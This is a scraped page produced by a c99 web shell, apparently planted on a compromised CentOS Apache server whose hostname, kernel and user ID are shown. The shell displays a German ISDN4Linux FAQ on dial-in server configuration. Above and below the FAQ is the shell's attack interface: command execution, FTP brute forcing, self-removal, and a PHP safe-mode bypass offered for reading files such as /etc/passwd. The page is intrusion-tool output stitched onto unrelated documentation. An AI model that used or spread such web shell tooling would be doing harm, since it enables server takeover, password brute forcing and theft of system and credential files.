!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/isdn4k-utils-3.2/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     i4lfaq-de-22.html (7.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ISDN4LINUX - FAQ (deutsche Version): dialin: Konfiguration eines Einwahl(Dial-In)-Servers Next Previous Contents

22. dialin: Konfiguration eines Einwahl(Dial-In)-Servers

22.1 dialin_config: Wie kann ich anderen den Zugang über ISDN ermöglichen?

Einige Konfigurationsbeispiele findest Du auf http://www.rosat.mpe-garching.mpg.de/~web/ISDN.html. Wenn Du mit der Einrichtung Probleme hast, versuche das neueste Paket von ISDN4LINUX zu bekommen (siehe Frage distrib_getlatest). Wie gewohnt kannst Du auch in der Mailingliste nachfragen. Im Allgemeinen gibt es mehrere Möglichkeiten, Dial-In einzurichten. Es kommt darauf an, wie Du möchtest, daß sich andere bei Dir einwählen.

  • Richte Netzwerk-Devices zur Einwahl über syncppp oder rawip ein. Setze die Option secure off um jedem die Einwahl zu ermöglichen oder secure on um die Einwahl nur über ISDN-Nummern zu ermöglichen, die Du mit isdnctrl addphone <device> in <Telefonnummer> einträgst. Es wurde berichtet, daß Du die Option ms-dns für ipppd setzen musst damit die IPCP-Verhandlung funktioniert.
  • Benutze die ttyI* Devices für asyncppp oder X.75.
Es folgen weitere Details zur Einstellung der ttyI* Devices. Die Konfiguration ist wie bei einem seriellen Port. Starte ein getty (mgetty von Gert Doering ist sehr empfehlenswert) auf einem der ISDN Devices (/dev/ttyI*). Der Eintrag in /etc/inittab sollte etwa so aussehen:
I0:56:respawn:/usr/local/sbin/mgetty ttyI0
I1:56:respawn:/usr/local/sbin/mgetty ttyI1

Der folgende Init-String muss in die mgetty.config eingetragen werden, damit mgetty weiss, auf welche MSN oder EAZ es lauschen muss. Wenn Deine MSN z.B. 123456 lautet:
port ttyI0
modem-type data
speed 38400
init-chat '' ATZ OK AT&E123456 OK AT&B512 OK

Die Blockgröße wurde für X.75 auf 512 Bytes gesetzt. Alternativ kannst Du auch die gesamte Einstellung in /etc/inittab in einer Zeile schreiben (hier wegen der Randeinstellungen in 2 Zeilen gedruckt!):
i0:45:respawn:/sbin/mgetty -D -m '"" ATZ OK AT&E123456 OK
AT&B512 OK' -s 38400 ttyI0

Der eleganteste Weg ist der Gebrauch von iprofd. Die Benutzung dieses Systemdienstes wird möglich durch den Befehl AT&W0 in der I4L Modememulation. Du startest iprofd mit einem Pfad als Parameter, z.B. 'iprofd /etc/i4lprofile'. Dann öffnest Du mit minicom oder einem anderen Terminalprogramm ein ISDN tty Device und gibst den nötigen AT-Befehl manuell ein. Danach gibst Du den Befehl AT&W0 ein. Der Kernel veranlasst daraufhin iprofd dazu, die aktuelle Konfiguration in die Datei zu schreiben. Von nun an reicht es aus, iprofd in Deinem ISDN Initscript zu starten und die entsprechenden ISDN tty Devices mit ATZ zu initialisieren.

22.2 dialin_manyparallel: Wie kann ich mehreren Leuten gleichzeitig die Einwahl ermöglichen?

Du musst exakt so viele gettys oder Netzwerk Interfaces einrichten, wie sich Leute gleichzeitig einwählen dürfen. Diese gettys oder Netzwerk Interfaces können die gleiche MSN benutzen, da mehrere Leute gleichzeitig mit der gleichen MSN verbunden sein können (solange freie B-Kanäle vorhanden sind). Es kann jedoch nur ein getty jeweils einem einzelnen ttyI* Device zugeordnet sein.

22.3 dialin_analogditalsamettyi: Kann ich ein ttyI*-Device so einrichten, daß es sowohl digitale als auch analoge Einwahlversuche annimmt?

Dies ist nicht möglich, da der Digitalmodus andere Registereinstellungen erfordert als der analoge Modus. Daher musst Du für diesen Zweck zwei dazu bestimmte Devices einrichten. Beachte dabei, daß Einwahlversuche von analogen Modems nur bei den wenigen Karten möglich sind, bei denen sowohl die Karte als auch der isdn4linux-Treiber das unterstützen.

22.4 dialin_fixedip: Wie kann ich bei Einwahlen via ipppd jedem User eine feste IP zuordnen?

Spezifiziere die feste IP-Adresse in der Datei pap/chap-secrets zusammen mit dem Usernamen und Passwort (siehe man ipppd).

22.5 dialin_hdlc: Jemand möchte sich mit HDLC durch mein mgetty einwählen. Ist ttyI1 korrekt oder muss ich mit ttyI0 beginnen?

Das spielt keine Rolle. Es hat auch nichts mit der Nummer des B-Kanals (0 oder 1) zu tun. Du musst nur HDLC im Init-String aktivieren (ATS14=3).

22.6 dialin_autoppp: Ist es mit mgetty möglich, beim Empfang von LCP-Frames den pppd automatisch zu starten?

Ja, ist es. Dieses Feature nennt sich 'AutoPPP'. Siehe Konfiguration von mgetty.

22.7 dialin_passwd: Wie bringe ich (i)pppd dazu, bei einer Einwahl die Passwörter mit /etc/passwd statt mit /etc/ppp/pap-secrets zu vergleichen?

ipppd muss mit den Optionen 'login' und 'auth' gestartet werden. In /etc/ppp/pap-secrets muss bei einer Beschränkung auf bestimmte User für jeden dieser User die folgende Zeile existieren:


login-name * '' *

Um allen Usern die Einwahl zu erlauben genügt:
* * '' *

Die letztere Wirkung tritt auch ein, wenn keine Datei pap-secrets existiert.

22.8 dialin_ignored: Ich bekomme dauernd die Meldung 'isdn_tty: call from XXX - YYY ignored'. Wieso ignoriert ISDN4LINUX (syncPPP) diesen Einwahlversuch?

Da gibt es zwei mögliche Erklärungen. Entweder ist Deine eigene MSN (hier: YYY) nicht korrekt mit 'isdnctrl eaz interface YYY' eingetragen. Oder es wurde die Option 'isdnctrl secure interface on' gesetzt, ohne die Anrufe von dieser Nummer (hier: XXX) mit 'isdnctrl addphone interface in XXX' zu erlauben.

22.9 dialin_async: Eine SunISDN versucht sich in mein I4L-System einzuwählen.

Die Sun versucht mit asyncPPP zu kommunizieren. ipppd kann damit nicht umgehen, Du musst die ttyI* Devices und den normalen pppd benutzen.


Next Previous Contents

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0102 ]--